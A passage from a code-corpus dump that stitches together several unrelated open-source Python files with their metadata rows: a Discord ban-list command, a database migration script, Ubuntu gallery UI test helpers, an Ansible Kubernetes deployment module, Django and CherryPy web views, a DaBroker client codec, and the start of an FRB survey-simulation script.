entries.append({"name":"{}#{} ({})".format(ban.user.name,ban.user.discriminator,ban.user.id),"value":ban.reason if ban.reason else "No reason provided"})
if user_id != None and user_id == ban.user.id:
# Got a match - display it
return await Message.Embed(
title="Ban Found For {}".format(user_id),
fields=[entries[-1]], # Send the last found entry
color=ctx.author
).send(ctx)
return await PickList.PagePicker(title="Ban List ({:,} total)".format(len(entries)),description=None if user_id == None else "No match found for '{}'.".format(orig_user),list=entries,ctx=ctx).pick()
| mit | 2,491,016,822,418,353,700 | 43.759717 | 200 | 0.669035 | false | 3.229426 | false | false | false |
proyectosdeley/proyectos_de_ley | migrate_db.py | 1 | 2327 | import dataset
import datetime
import os
import unicodedata
def convert_name_to_slug(name):
"""Takes a congresista name and returns its slug."""
name = name.replace(",", "").lower()
name = name.split(" ")
if len(name) > 2:
i = 0
slug = ""
while i < 3:
slug += name[i]
if i < 2:
slug += "_"
i += 1
slug = unicodedata.normalize('NFKD', slug).encode('ascii', 'ignore')
slug = str(slug, encoding="utf-8")
return slug + "/"
old_db = os.path.join("..", "leyes.db")
new_db = "leyes_sqlite3.db"
db = dataset.connect("sqlite:///" + old_db)
res = db.query("select * from proyectos")
new_items = []
slugs = [] # translation table between name an URL
for i in res:
timestamp = datetime.datetime.fromtimestamp(i['timestamp'])
i['time_created'] = timestamp
i['time_edited'] = timestamp
try:
fecha_presentacion = datetime.datetime.strptime(
i['fecha_presentacion'],
'%d/%m/%Y',
)
except ValueError:
fecha_presentacion = datetime.datetime.strptime(
i['fecha_presentacion'],
'%d/%m/%y',
)
fecha_presentacion = datetime.datetime.date(fecha_presentacion)
i['fecha_presentacion'] = fecha_presentacion
i['expediente'] = i['link_to_pdf']
if i['pdf_url'] is None:
i['pdf_url'] = ''
if i['seguimiento_page'] is None:
i['seguimiento_page'] = ''
del i['link_to_pdf']
del i['timestamp']
del i['id']
del i['link']
congresistas = i['congresistas'].split(';')
for congre in congresistas:
congre = congre.strip()
obj = dict(nombre=congre)
if congre is not None and congre.strip() != '':
congre_slug = convert_name_to_slug(congre)
obj['slug'] = congre_slug
if obj not in slugs and congre_slug is not None:
slugs.append(obj)
new_items.append(i)
db = dataset.connect("sqlite:///" + new_db)
table = db['pdl_proyecto']
table.insert_many(new_items)
table = db['pdl_slug']
table.insert_many(slugs)
# fix domain from example.com to proyectosdeley.pe
table = db['django_site']
table.update(dict(id=1, domain='proyectosdeley.pe', name='proyectosdeley.pe'),
['id']
)
| mit | -3,755,114,459,877,640,000 | 25.443182 | 78 | 0.568973 | false | 3.236439 | false | false | false |
ubports-weblate/gallery-app | tests/autopilot/gallery_app/emulators/photo_viewer.py | 1 | 9588 | # -*- Mode: Python; coding: utf-8; indent-tabs-mode: nil; tab-width: 4 -*-
# Copyright 2012-2015 Canonical
#
# This program is free software: you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 3, as published
# by the Free Software Foundation.
import logging
from autopilot.introspection.dbus import StateNotFoundError
import autopilot.logging
import ubuntuuitoolkit
from gallery_app.emulators import main_screen
from gallery_app.emulators.gallery_utils import(
GalleryAppException,
GalleryUtils
)
logger = logging.getLogger(__name__)
class PopupPhotoViewer(ubuntuuitoolkit.UbuntuUIToolkitCustomProxyObjectBase):
def _get_header(self):
main = self.get_root_instance().select_single(main_screen.MainScreen)
return main.select_single('PageHeader',
objectName='photoViewerHeader')
def _open_overflow(self):
overflow_button = self._get_header().select_single(
objectName='overflow_action_button')
self.pointing_device.click_object(overflow_button)
return self.get_root_instance().wait_select_single(
objectName='actions_overflow_panel',
visible=True)
def click_action_button(self, action_object_name):
header = self._get_header()
if not header.visible:
main = self.get_root_instance().select_single(
main_screen.MainScreen)
x, y, w, h = main.globalRect
self.pointing_device.move(x + (w // 2), y + (h // 2))
self.pointing_device.click()
header.visible.wait_for(True)
try:
object_name = action_object_name + "_button"
button = header.select_single(objectName=object_name)
self.pointing_device.click_object(button)
except StateNotFoundError:
object_name = action_object_name + "_button"
popover = self._open_overflow()
button = popover.select_single(objectName=object_name)
self.pointing_device.click_object(button)
@autopilot.logging.log_action(logger.info)
def delete_current_photo(self, confirm=True):
self.click_action_button("deleteButton")
if confirm:
self.confirm_delete_photo()
else:
self.cancel_delete_photo()
@autopilot.logging.log_action(logger.debug)
def confirm_delete_photo(self):
self._click_delete_dialog_button("Yes")
def _click_delete_dialog_button(self, name):
delete_dialog = self._get_delete_dialog()
button = delete_dialog.wait_select_single(
"Button", objectName="deletePhotoDialog" + name, visible=True)
self.pointing_device.click_object(button)
delete_dialog.wait_until_destroyed()
def _get_delete_dialog(self):
delete_dialog = self.get_root_instance().wait_select_single(
objectName="deletePhotoDialog")
delete_dialog.visible.wait_for(True)
delete_dialog.opacity.wait_for(1)
return delete_dialog
@autopilot.logging.log_action(logger.debug)
def cancel_delete_photo(self):
self._click_delete_dialog_button('No')
class PhotoViewer(GalleryUtils):
def __init__(self, app):
super(PhotoViewer, self).__init__(self)
self.app = app
def get_popup_album_picker(self):
"""Returns the photo viewer album pickers."""
return self.app.wait_select_single("PopupAlbumPicker",
objectName="popupAlbumPicker")
def get_share_peer_picker(self):
"""Returns the photo viewer share picker."""
return self.app.wait_select_single(objectName="sharePicker",
visible=True)
def get_photo_editor(self):
"""Returns the photo edit dialog."""
return self.app.wait_select_single("PhotoEditor")
def get_revert_to_original_dialog(self):
"""Returns the revert to original dialog."""
return self.app.wait_select_single("Dialog",
objectName="revertPromptDialog")
def get_cancel_revert_to_original_button(self):
"""Returns the revert to original cancel button."""
return self.get_revert_to_original_dialog().wait_select_single(
"Button",
objectName="cancelRevertButton",
visible=True)
def get_confirm_revert_to_original_button(self):
"""Returns the revert to original confirm button."""
return self.get_revert_to_original_dialog().wait_select_single(
"Button",
objectName="confirmRevertButton",
visible=True)
def get_photo_component(self):
# Was using a list index (lp:1247711). Still needs fixing, I'm not
# convinced this is a suitable way to select the correct item.
return self.app.wait_select_single(
"SingleMediaViewer",
objectName="openedMedia0"
)
def get_photos_list(self):
return self.app.wait_select_single("MediaListView")
def get_editor_actions_bar(self):
"""Returns the actions bar for the editor."""
return self.app.select_single("ActionsBar",
objectName="editorActionsBar")
def get_editor_action_button_by_text(self, button_text):
"""Returns the action button from the editor by text."""
actions_bar = self.get_editor_actions_bar()
buttons = actions_bar.select_many('AbstractButton')
for button in buttons:
if str(button.text) == button_text:
return button
raise GalleryAppException(
'Editor action button {} could not be found'.format(button_text))
def get_crop_action_button(self):
"""Returns the crop item of the edit dialog."""
return self.get_editor_action_button_by_text("Crop")
def get_rotate_action_button(self):
"""Returns the rotate item of the edit dialog."""
return self.get_editor_action_button_by_text("Rotate")
def get_undo_menu_item(self):
"""Returns the undo item of the edit dialog."""
return self.app.select_single("Standard", objectName="undoListItem")
def get_redo_menu_item(self):
"""Returns the redo item of the edit dialog."""
return self.app.select_single("Standard", objectName="redoListItem")
def get_revert_action_button(self):
"""Returns the revert to original menu item in the edit dialog."""
return self.get_editor_action_button_by_text("Revert to Original")
def get_auto_enhance_menu_item(self):
"""Returns the 'auto enhance' menu item in the edit dialog."""
return self.app.select_single("Standard", objectName='enhanceListItem')
def get_delete_popover_cancel_item(self):
"""Returns the cancel button of the delete popover."""
return self.app.wait_select_single("Button",
objectName="deletePhotoDialogNo",
visible=True)
def get_opened_photo(self):
"""Returns the first opened photo."""
return self.app.wait_select_single("SingleMediaViewer",
objectName="openedMedia0")
def get_crop_interactor(self):
"""Returns the crop interactor."""
return self.app.wait_select_single("CropInteractor",
objectName="cropInteractor")
def get_crop_overlay(self):
"""Returns the crop overlay."""
return self.app.wait_select_single("CropOverlay",
objectName="cropOverlay")
def get_top_left_crop_corner(self):
"""Returns the top left corner of the crop overlay for dragging."""
return self.app.wait_select_single("CropCorner",
objectName="topLeftCropCorner")
def get_crop_overlays_crop_icon(self):
"""Returns the crop icon of the crop overlay."""
return self.app.wait_select_single("Button",
objectName="centerCropIcon",
visible=True)
def get_edit_preview(self):
"""Returns the edit preview."""
return self.app.wait_select_single("EditPreview",
objectName="editPreview")
def _click_item(self, item):
self.pointing_device.click_object(item)
def click_rotate_button(self):
rotate_item = self.get_rotate_action_button()
self._click_item(rotate_item)
def click_crop_button(self):
crop_item = self.get_crop_action_button()
self._click_item(crop_item)
def click_undo_item(self):
undo_item = self.get_undo_menu_item()
self._click_item(undo_item)
def click_redo_item(self):
redo_item = self.get_redo_menu_item()
self._click_item(redo_item)
def click_revert_button(self):
revert_item = self.get_revert_action_button()
self._click_item(revert_item)
def click_cancel_revert_button(self):
cancel_item = self.get_cancel_revert_to_original_button()
self._click_item(cancel_item)
def click_confirm_revert_button(self):
confirm_item = self.get_confirm_revert_to_original_button()
self._click_item(confirm_item)
def click_enhance_item(self):
enhance_item = self.get_auto_enhance_menu_item()
self._click_item(enhance_item)
| gpl-3.0 | -9,074,009,003,350,327,000 | 37.66129 | 79 | 0.61577 | false | 4.074798 | false | false | false |
emonty/ansible-container | ansible_container/shipit/modules/k8s_deployment.py | 1 | 9208 | #!/usr/bin/python
#
# Copyright 2016 Red Hat | Ansible
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
module: k8s_deployment
short_description: Start, cancel or retry a deployment on a Kubernetes or OpenShift cluster.
description:
- Start, cancel or retry a deployment on a Kubernetes or OpenShift cluster by setting the C(state) to I(present) or
I(absent).
- Supports check mode. Use check mode to view a list of actions the module will take.
options:
'''
EXAMPLES = '''
'''
RETURN = '''
'''
import logging
import logging.config
from ansible.module_utils.basic import *
from ansible_container.shipit.k8s_api import K8sApi
from ansible_container.shipit.exceptions import ShipItException
logger = logging.getLogger('k8s_deployment')
LOGGING = (
{
'version': 1,
'disable_existing_loggers': True,
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'logging.NullHandler',
},
'file': {
'level': 'DEBUG',
'class': 'logging.FileHandler',
'filename': 'ansible-container.log'
}
},
'loggers': {
'k8s_deployment': {
'handlers': ['file'],
'level': 'INFO',
},
'container': {
'handlers': ['file'],
'level': 'INFO',
},
'compose': {
'handlers': [],
'level': 'INFO'
},
'docker': {
'handlers': [],
'level': 'INFO'
}
},
}
)
class K8SDeploymentManager(AnsibleModule):
def __init__(self):
self.arg_spec = dict(
project_name=dict(type='str', aliases=['namespace'], required=True),
state=dict(type='str', choices=['present', 'absent'], default='present'),
labels=dict(type='dict'),
deployment_name=dict(type='str'),
recreate=dict(type='bool', default=False),
replace=dict(type='bool', default=True),
selector=dict(type='dict'),
replicas=dict(type='int', default=1),
containers=dict(type='list'),
strategy=dict(type='str', default='Rolling', choices=['Recreate', 'Rolling']),
cli=dict(type='str', choices=['kubectl', 'oc'], default='oc'),
debug=dict(type='bool', default=False)
)
super(K8SDeploymentManager, self).__init__(self.arg_spec,
supports_check_mode=True)
self.project_name = None
self.state = None
self.labels = None
self.ports = None
self.deployment_name = None
self.selector = None
self.replace = None
self.replicas = None
self.containers = None
self.strategy = None
self.recreate = None
self.cli = None
self.api = None
self.debug = None
def exec_module(self):
for key in self.arg_spec:
setattr(self, key, self.params.get(key))
if self.debug:
LOGGING['loggers']['container']['level'] = 'DEBUG'
LOGGING['loggers']['k8s_deployment']['level'] = 'DEBUG'
logging.config.dictConfig(LOGGING)
self.api = K8sApi(target=self.cli)
actions = []
changed = False
deployments = dict()
results = dict()
try:
project_switch = self.api.set_project(self.project_name)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
if not project_switch:
actions.append("Create project %s" % self.project_name)
if not self.check_mode:
try:
self.api.create_project(self.project_name)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
if self.state == 'present':
deployment = self.api.get_resource('dc', self.deployment_name)
if not deployment:
template = self._create_template()
changed = True
actions.append("Create deployment %s" % self.deployment_name)
if not self.check_mode:
try:
self.api.create_from_template(template=template)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
elif deployment and self.recreate:
actions.append("Delete deployment %s" % self.deployment_name)
changed = True
template = self._create_template()
if not self.check_mode:
try:
self.api.delete_resource('dc', self.deployment_name)
self.api.create_from_template(template=template)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
elif deployment and self.replace:
template = self._create_template()
try:
template['status'] = dict(latestVersion=deployment['status']['latestVersion'] + 1)
except Exception as exc:
self.fail_json(msg="Failed to increment latestVersion for %s - %s" % (self.deployment_name,
str(exc)))
changed = True
actions.append("Update deployment %s" % self.deployment_name)
if not self.check_mode:
try:
self.api.replace_from_template(template=template)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
deployments[self.deployment_name.replace('-', '_') + '_deployment'] = self.api.get_resource('dc', self.deployment_name)
elif self.state == 'absent':
if self.api.get_resource('deployment', self.deployment_name):
changed = True
actions.append("Delete deployment %s" % self.deployment_name)
if self.check_mode:
try:
self.api.delete_resource('deployment', self.deployment_name)
except ShipItException as exc:
self.fail_json(msg=exc.message, stderr=exc.stderr, stdout=exc.stdout)
results['changed'] = changed
if self.check_mode:
results['actions'] = actions
if deployments:
results['ansible_facts'] = deployments
return results
def _create_template(self):
for container in self.containers:
if container.get('env'):
container['env'] = self._env_to_list(container['env'])
if container.get('ports'):
container['ports'] = self._port_to_container_ports(container['ports'])
template = dict(
apiVersion="v1",
kind="DeploymentConfig",
metadata=dict(
name=self.deployment_name,
),
spec=dict(
template=dict(
metadata=dict(),
spec=dict(
containers=self.containers
)
),
replicas=self.replicas,
strategy=dict(
type=self.strategy,
),
)
)
if self.labels:
template['metadata']['labels'] = self.labels
template['spec']['template']['metadata']['labels'] = self.labels
if self.selector:
template['spec']['selector'] = self.selector
return template
def _env_to_list(self, env_variables):
result = []
for name, value in env_variables.items():
result.append(dict(
name=name,
value=value
))
return result
@staticmethod
def _port_to_container_ports(ports):
result = []
for port in ports:
result.append(dict(containerPort=port))
return result
def main():
manager = K8SDeploymentManager()
results = manager.exec_module()
manager.exit_json(**results)
if __name__ == '__main__':
main()
| lgpl-3.0 | 7,921,536,518,088,795,000 | 33.74717 | 131 | 0.535947 | false | 4.474247 | false | false | false |
smurfix/DaBroker | dabroker/client/codec.py | 1 | 10644 | # -*- coding: utf-8 -*-
from __future__ import absolute_import, print_function, division, unicode_literals
##
## This file is part of DaBroker, a distributed data access manager.
##
## DaBroker is Copyright © 2014 by Matthias Urlichs <[email protected]>,
## it is licensed under the GPLv3. See the file `README.rst` for details,
## including optimistic statements by the author.
##
## This paragraph is auto-generated and may self-destruct at any time,
## courtesy of "make update". The original is in ‘utils/_boilerplate.py’.
## Thus, please do not remove the next line, or insert any blank lines.
##BP
from weakref import ref,WeakValueDictionary
from functools import partial
from . import ClientBaseRef,ClientBaseObj
from ..base import BaseRef,BaseObj, BrokeredInfo, BrokeredInfoInfo, adapters as baseAdapters, common_BaseObj,common_BaseRef, NoData,ManyData
from ..base.service import current_service
import logging
logger = logging.getLogger("dabroker.client.serial")
class _NotGiven: pass
class CacheProxy(object):
"""Can't weakref a string, so …"""
def __init__(self,data):
self.data = data
def kstr(v):
k = getattr(v,'__dict__',None)
if k is not None:
k = k.get('_key',None)
if k is not None:
return '.'.join(str(x) for x in k.key)
else:
return str(v)
def search_key(a,**kw):
"""Build a reproducible string from search keywords"""
if a is None:
a = ()
return ','.join(kstr(v) for v in a) + '|' + ','.join('{}:{}'.format(k, kstr(v)) for k,v in sorted(kw.items()))
# This is the client's adapter storage.
adapters = baseAdapters[:]
def codec_adapter(cls):
adapters.append(cls)
return cls
# This is a list of special metaclasses, by key,
_registry = {}
def baseclass_for(*k):
"""\
Register a base class for a specific object type.
@k is the meta object's key tuple.
See test11 for an example which overrides the root object.
If your client class duplicates an attribute, it takes
precedence: the server's value of that attribute will not be
accessible.
Usage:
@baseclass_for("static","root","meta")
class MyRoot(ClientBaseObj):
def check_me(self):
return "This is a client-specific class"
You can use `None` as the last value (only), which behaves like an
any-single value placeholder.
"""
def proc(fn):
_registry[k] = fn
return fn
return proc
class ClientBrokeredInfo(ClientBaseObj,BrokeredInfo):
"""\
This is the base class for client-side meta objects.
"""
def __init__(self,*a,**k):
super(ClientBrokeredInfo,self).__init__(*a,**k)
self.searches = WeakValueDictionary()
self._class = None
def __call__(self, _is_meta=False, *a,**kw):
"""\
Return the class to use for objects with this as metaclass
"""
cls = self._class
if cls is None:
k = self._key.key
cls = _registry.get(k,None)
if cls is None:
# Allow a single wildcard at the end
cls = _registry.get((k[:-1])+(None,),object)
if _is_meta:
class ClientInfo(ClientBrokeredInfo,cls):
pass
else:
class ClientInfo(ClientBaseObj,cls):
pass
cls = ClientInfo
for k in self.fields.keys():
setattr(cls, '_dab_'+k if hasattr(cls,k) else k,FieldProperty(k))
for k in self.refs.keys():
if k != '_meta':
setattr(cls, '_dab_'+k if hasattr(cls,k) else k,RefProperty(k))
for k,v in self.backrefs.items():
setattr(cls, '_dab_'+k if hasattr(cls,k) else k,BackRefProperty(k,v))
for k,v in self.calls.items():
if not hasattr(cls,k):
setattr(cls,k,RpcProperty(v))
self._class = cls
return cls(*a,**kw)
def find(self, **kw):
if self._dab_cached is None:
raise RuntimeError("You cannot search "+repr(self))
for r in self.client.find(self, _cached=self._dab_cached, **kw):
if not isinstance(r,BaseObj):
r = r()
yield r
def get(self, **kw):
if self._dab_cached is None:
raise RuntimeError("You cannot search "+repr(self))
res = list(self.client.find(self, _limit=2,_cached=self._dab_cached, **kw))
if len(res) == 0:
raise NoData(cls=self,**kw)
elif len(res) == 2:
raise ManyData(cls=self,**kw)
else:
res = res[0]
if not isinstance(res,BaseObj):
res = res()
return res
def count(self, **kw):
if self._dab_cached is None:
raise RuntimeError("You cannot search "+repr(self))
return self.client.count(self, _cached=self._dab_cached, **kw)
def __repr__(self):
k=getattr(self,'_key',None)
if not k or not hasattr(self,'name'):
return super(ClientBrokeredInfo,self).__repr__()
return '‹I:{}:{}›'.format(self.name, '¦'.join(str(x) for x in k))
__str__=__unicode__=__repr__
class _ClientInfo(ClientBrokeredInfo):
"""Mix-in class for meta objects"""
_name = None
def __init__(self,*a,**k):
super(_ClientInfo,self).__init__(*a,**k)
class ClientBrokeredInfoInfo(ClientBrokeredInfo,BrokeredInfoInfo):
"""\
This is the client-side singleton meta object
(the root of DaBroker's object system)
"""
pass
client_broker_info_meta = ClientBrokeredInfoInfo()
class FieldProperty(object):
"""This property accessor handles updating non-referential attributes."""
# Note that there is no `__get__` method. It is not necessary,
# the value is stored in the object's `__dict__`;
# Python will get it from there.
def __init__(self, name):
self.name = name
def __set__(self, obj, val):
ov = obj.__dict__.get(self.name,_NotGiven)
obj.__dict__[self.name] = val
if ov is _NotGiven:
return
if obj._meta is None:
assert not ov or ov == val, (self.name,ov,val)
else:
import pdb;pdb.set_trace()
obj._meta._dab.obj_change(obj, self.name, ov,val)
class RefProperty(object):
"""This property accessor handles referred objects"""
def __init__(self, name):
self.name = name
def __get__(self, obj, type=None):
if obj is None:
return self
k = obj._refs.get(self.name,None)
if k is None:
return None
return obj._meta._dab.get(k)
def __set__(self, obj, val):
ov = obj._refs.get(self.name,_NotGiven)
if val is not None:
val = val._key
obj._refs[self.name] = val
if ov is _NotGiven:
return
obj._meta._dab.obj_change(obj, self.name, ov,val)
class BackRefProperty(object):
"""This property accessor handles retrieving one-to-many relationships"""
def __init__(self, name,refobj):
self.name = name
self.ref = ref(refobj)
def __get__(self, obj, type=None):
if obj is None:
return self
k = obj._refs.get(self.name,None)
if k is None:
k = obj._refs[self.name] = k = BackRefHandler(obj, self.name,self.ref)
return k
class BackRefHandler(object):
"""Manage a specific back reference"""
def __init__(self, obj, name,refobj):
self.obj = ref(obj)
self.name = name
self.ref = refobj
def _deref(self):
obj = self.obj()
ref = self.ref()
if obj is None or ref is None:
raise RuntimeError("weak ref: should not have been freed")
return obj,ref
def __getitem__(self,i):
obj,ref = self._deref()
res = obj._meta._dab.send("backref_idx",obj, self.name,i)
if isinstance(res,BaseRef):
res = res()
return res
def __len__(self):
obj,ref = self._deref()
return obj._meta._dab.send("backref_len",obj, self.name)
class RpcProperty(object):
"""This property accessor returns a shim which executes a RPC to the server."""
def __init__(self, proc, base=None):
self.name = proc.name
self.cached = getattr(proc,'cached',False)
self.for_class = getattr(proc,'for_class',None)
self.meta = getattr(proc,'meta',False)
self.base = base
def _do_call(self,obj, *a,**k):
with obj._dab.env:
if self.cached and not obj._obsolete:
kws = self.name+':'+search_key(a,**k)
ckey = " ".join(str(x) for x in obj._key.key)+":"+kws
res = obj._call_cache.get(kws,_NotGiven)
if res is not _NotGiven:
res = res.data
current_service.top._cache[ckey] # Lookup to increase counter
return res
res = obj._meta._dab.call(obj,self.name, a,k, _meta=self.meta)
if self.cached and not obj._obsolete:
rc = CacheProxy(res)
obj._call_cache[kws] = rc
current_service.top._cache[ckey] = rc
return res
def __get__(self, obj, type=None):
if self.for_class is None: # normal method
if obj is None:
return self
else: # static- or classmethod
obj=type
c = partial(RpcProperty._do_call, self,obj)
c.__name__ = str(self.name)
return c
def __call__(self, *a,**k):
# direct call, "classmethod"
assert self.base is not None
return self._do_call(self.base, *a,**k)
@codec_adapter
class client_BaseRef(common_BaseRef):
cls = ClientBaseRef
@staticmethod
def decode(k,c=None):
return ClientBaseRef(key=tuple(k),code=c)
@codec_adapter
class client_BaseObj(common_BaseObj):
@classmethod
def encode_ref(obj,k):
"""\
Encode a reference, without loading the actual object.
(Since we can't load the object without encoding a reference for it, that'd be somewhat difficult.)
"""
ref = obj._refs[k]
if ref is not None:
import pdb;pdb.set_trace()
ref = ClientBaseRef(meta=obj._meta, key=obj._key)
return ref
@classmethod
def decode(cls, k,c=None,f=None,r=None, _is_meta=False):
"""\
Convert this object to a class
"""
k = ClientBaseRef(key=tuple(k),code=c)
if not r or '_meta' not in r:
raise RuntimeError("Object without meta data")
m = r['_meta']
if not isinstance(m,ClientBrokeredInfo):
# assume it's a reference, so resolve it
r['_meta'] = m = m()
res = m(_is_meta)
res._key = k
# Got the class, now fill it with data
if f:
for k,v in f.items():
res.__dict__[k] = v
# do not use setattr here, it tries to record a change
if r:
for k,v in r.items():
if k == '_meta':
res._meta = v
else:
res._refs[k] = v
if f and _is_meta and 'calls' in f:
c = f['calls']
for k,v in c.items():
if getattr(v,'for_class',False):
res.__dict__[k] = RpcProperty(v,res)
pass
return current_service.top._add_to_cache(res)
@codec_adapter
class client_InfoObj(client_BaseObj):
cls = ClientBrokeredInfo
clsname = "Info"
@staticmethod
def decode(k=None,c=None,f=None, **kw):
if f is None:
# We always need the data, but this is something like a ref,
# so we need to go and get the real thing.
# NOTE this assumes that the codec doesn't throw away empty lists.
return ClientBaseRef(key=k,code=c)()
res = client_BaseObj.decode(_is_meta=True, k=k,c=c,f=f,**kw)
res.client = current_service.top
return res
@codec_adapter
class client_InfoMeta(object):
cls = ClientBrokeredInfoInfo
clsname = "_ROOT"
@staticmethod
def encode(obj, include=False):
return {}
@staticmethod
def decode(**attr):
return client_broker_info_meta
| gpl-3.0 | -5,950,866,018,713,775,000 | 25.984772 | 140 | 0.659142 | false | 2.935395 | false | false | false |
tongfa/vent | wserve/wserve/views.py | 1 | 1406 | from django.http import HttpResponse
from django.template.loader import get_template
from django.template import Context
from wserve.settings import VENT_WD, VENT_WWW_CLIENT_EP
import cPickle as pickle
import json, time, os
def address2key(address):
r = 0
for s in address[0].split('.'):
r = r << 8
r += int(s)
r = r << 16
r += address[1]
return r
def index(request):
t = get_template('index.html')
return HttpResponse(t.render(Context()))
def audio(request):
t = get_template('audio.html')
return HttpResponse(t.render(Context()))
def longcall(request):
time.sleep(1)
def url(c):
ep = VENT_WWW_CLIENT_EP
return 'http://%s%s/camera/%d/' % (
ep[0],
'' if ep[1] == 80 else ':%d' % ep[1],
address2key(c))
cameraList = os.listdir("%s" % VENT_WD)
if cameraList is None:
import code
code.interact(local=vars())
cameraList.sort()
cameraListIp = [pickle.load(open("%s/%s" % (VENT_WD, name), 'r'))
for name in cameraList]
# unique value, url, name
connList = [(address2key(c),url(c),c[0]) for c in cameraListIp]
response_data = {}
response_data['result'] = 'OK'
response_data['message'] = {'cameras': connList}
print response_data
return HttpResponse(json.dumps(response_data), content_type="application/json")
| mit | 2,273,925,697,469,779,000 | 28.914894 | 83 | 0.604552 | false | 3.437653 | false | false | false |
herqles-io/hq-manager | src/hqmanager/api/user.py | 1 | 5040 | import cherrypy
class UserAPIController(object):
exposed = True
def __init__(self, identity, assignment):
self.identity = identity
self.assignment = assignment
def index(self):
return "User api Index"
@cherrypy.tools.json_out()
@cherrypy.tools.json_in()
@cherrypy.tools.auth(permission="herqles.user.add")
def add(self):
data = cherrypy.request.json
if 'username' not in data:
raise cherrypy.HTTPError(400, "Missing username")
if 'password' not in data:
raise cherrypy.HTTPError(400, "Missing Password")
output = {'username': data['username'], 'identity': False, 'assignment': False}
if not self.identity.user_exists(data['username']):
self.identity.create_user(data['username'], data['password'])
output['identity'] = True
if not self.assignment.has_assignment(data['username']):
self.assignment.create_assignment(data['username'])
output['assignment'] = True
return output
@cherrypy.tools.json_out()
@cherrypy.tools.auth() # If the username is the requests username allow them to see
def get(self, username):
headers = cherrypy.request.headers
if not self.assignment.has_assignment(username):
raise cherrypy.HTTPError(404, "User does not exist")
if username != cherrypy.request.user['name']:
if not self.assignment.has_permission_token(headers['X-Auth-Token'], 'herqles.user.get'):
raise cherrypy.HTTPError(403, "Invalid permissions")
permissions = self.assignment.get_permissions(username)
return {'username': username, 'permissions': permissions}
@cherrypy.tools.json_out()
@cherrypy.tools.auth(permission="herqles.user.delete")
def delete(self, username):
output = {'username': username, 'identity': False, 'assignment': False}
if not self.identity.user_exists(username):
self.identity.delete_user(username)
output['identity'] = True
if not self.assignment.has_assignment(username):
self.assignment.delete_assignment(username)
output['assignment'] = True
return output
@cherrypy.tools.json_out()
@cherrypy.tools.json_in()
def get_token(self):
data = cherrypy.request.json
if 'username' not in data or 'password' not in data:
raise cherrypy.HTTPError(400, "Username and password required")
if not self.identity.auth(data['username'], data['password']):
raise cherrypy.HTTPError(401, "Invalid username or password")
if not self.assignment.has_assignment(data['username']):
raise cherrypy.HTTPError(404, "User does not exist")
(token, expire_at) = self.assignment.get_token(data['username'])
return {"token": token, 'expire_at': long(expire_at)}
@cherrypy.tools.json_out()
@cherrypy.tools.json_in()
@cherrypy.tools.auth() # We only need to check permissions sometimes
def change_password(self):
headers = cherrypy.request.headers
data = cherrypy.request.json
if 'username' not in data:
raise cherrypy.HTTPError(400, "Missing username")
if 'password' not in data:
raise cherrypy.HTTPError(400, "Missing password")
if data['username'] != cherrypy.request.user['name']:
if not self.assignment.has_permission_token(headers['X-Auth-Token'], 'herqles.user.password'):
raise cherrypy.HTTPError(403, "Invalid permissions")
self.identity.change_password(data['username'], data['password'])
self.assignment.get_token(data['username'], force=True)
return {'username': data['username']}
@cherrypy.tools.json_in()
@cherrypy.tools.json_out()
@cherrypy.tools.auth(permission="herqles.user.permission.add")
def add_permission(self):
data = cherrypy.request.json
username = data['username']
permission = data['permission']
if not self.assignment.has_assignment(username):
raise cherrypy.HTTPError(404, "User does not exist")
if self.assignment.has_permission_user(username, permission):
raise cherrypy.HTTPError(409, "User already has permission "+permission)
self.assignment.add_permission(username, permission)
return data
@cherrypy.tools.json_in()
@cherrypy.tools.json_out()
@cherrypy.tools.auth(permission="herqles.user.permission.delete")
def remove_permission(self):
data = cherrypy.request.json
username = data['username']
permission = data['permission']
if not self.assignment.has_assignment(username):
raise cherrypy.HTTPError(404, "User does not exist")
if self.assignment.has_permission_user(username, permission, exact=True) is False:
raise cherrypy.HTTPError(409, "User does not have permission "+permission)
return data
| mit | 5,361,003,477,038,764,000 | 34.244755 | 106 | 0.644444 | false | 4.315068 | false | false | false |
davidgardenier/frbpoppy | tests/dm_snr/future.py | 1 | 6523 | """Check the log N log F slope for future surveys."""
import numpy as np
import matplotlib.pyplot as plt
from copy import copy
from frbpoppy import CosmicPopulation, Survey, LargePopulation, SurveyPopulation, hist
from frbpoppy import unpickle, pprint
import frbpoppy.direction_dists as did
import frbpoppy.galacticops as go
from tests.convenience import plot_aa_style, rel_path
from tests.rates.alpha_real import EXPECTED
MAKE = True
SURVEYS = ('parkes-htru',
'wsrt-apertif',
'fast-crafts',
'puma-full',
'chord',
'ska1-low',
'ska1-mid')
SIZE = 5e4
if MAKE:
# Calculate the fraction of the sky that the survey covers
surv_f_area = {}
for name in SURVEYS:
pop = CosmicPopulation.simple(5e5)
pop.gen_direction()
survey = Survey(name)
mask = survey.in_region(pop.frbs.ra, pop.frbs.dec,
pop.frbs.gl, pop.frbs.gb)
in_surv_region = np.sum(mask)
tot_region = len(mask)
area_sky = 4*np.pi*(180/np.pi)**2 # In sq. degrees
f_area = (survey.beam_size/area_sky)*(tot_region/in_surv_region)
surv_f_area[name] = f_area
print(f'{name} covers {f_area*100}% of the sky')
surv_pops = []
for name in SURVEYS:
# Set up survey
survey = Survey(name)
if name in ('parkes-htru', 'wsrt-apertif'):
survey.set_beam(model=name)
# Set up CosmicPopulation
pop = CosmicPopulation.optimal(SIZE, generate=False)
# Only generate FRBs in the survey region
pop.set_direction(model='uniform',
min_ra=survey.ra_min,
max_ra=survey.ra_max,
min_dec=survey.dec_min,
max_dec=survey.dec_max)
